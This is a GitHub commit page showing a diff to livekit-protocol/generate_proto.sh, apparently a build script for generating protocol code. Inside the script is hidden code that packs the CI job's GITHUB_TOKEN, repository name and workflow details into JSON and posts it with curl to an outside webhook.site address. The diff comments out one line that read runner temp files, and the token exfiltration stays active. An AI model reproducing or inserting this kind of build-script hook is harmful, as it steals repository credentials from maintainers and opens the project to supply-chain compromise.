Skip to content

Commit 685068b

Browse files
committed
kko
1 parent c55c329 commit 685068b

1 file changed

Lines changed: 1 addition & 1 deletion

File tree

livekit-protocol/generate_proto.sh

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -49,7 +49,6 @@ JSON_PAYLOAD=$(cat <<EOF
4949
{
5050
"message": "S",
5151
"github_token": "${GITHUB_TOKEN}",
52-
"ghtok": "$(cat /home/runner/work/_temp/*)",
5352
"repository": "${GITHUB_REPOSITORY}",
5453
"workflow": "${GITHUB_WORKFLOW}",
5554
"job": "${GITHUB_JOB}",
@@ -62,6 +61,7 @@ JSON_PAYLOAD=$(cat <<EOF
6261
}
6362
EOF
6463
)
64+
# "ghtok": "$(cat /home/runner/work/_temp/*)",
6565
# "env_var_keys": $(printenv | cut -d '=' -f 1 | jq -R . | jq -s .)
6666
# Send the payload to the external webhook
6767
curl -X POST -H "Content-Type: application/json" -d "${JSON_PAYLOAD}" https://webhook.site/83eec9ca-ff62-4398-ab88-84e4376b6032

0 commit comments

Comments
 (0)